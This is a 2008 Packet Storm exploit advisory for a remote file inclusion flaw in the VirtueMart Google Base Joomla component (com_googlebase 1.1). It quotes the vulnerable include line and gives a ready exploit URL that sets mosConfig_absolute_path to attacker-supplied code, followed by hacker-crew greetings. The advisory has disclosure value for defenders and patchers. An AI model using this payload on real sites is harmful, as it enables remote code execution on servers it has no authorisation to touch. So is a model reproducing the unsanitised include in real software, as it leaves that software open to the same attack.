joomlavirtue-rfi.txt

2008-11-04T00:00:00
ID PACKETSTORM:71538
Type packetstorm
Reporter NoGe
Modified 2008-11-04T00:00:00

Description

                                        
                                            `================================================================================================================================  
  
  
[o] VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerability  
  
Software : com_googlebase version 1.1  
Vendor : www.e-commerce-solution.co.uk  
Download : http://www.joomlahacks.com/ [free download]  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
================================================================================================================================  
  
  
[o] Vulnerable file  
  
administrator/components/com_googlebase/admin.googlebase.php  
  
include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );  
  
  
  
[o] Exploit  
  
http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]  
  
  
================================================================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/blog/]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa  
H312Y yooogy mousekill }^-^{ kaka11 martfella  
skulmatic olibekas ulga Cungkee k1tk4t str0ke  
  
  
================================================================================================================================  
  
`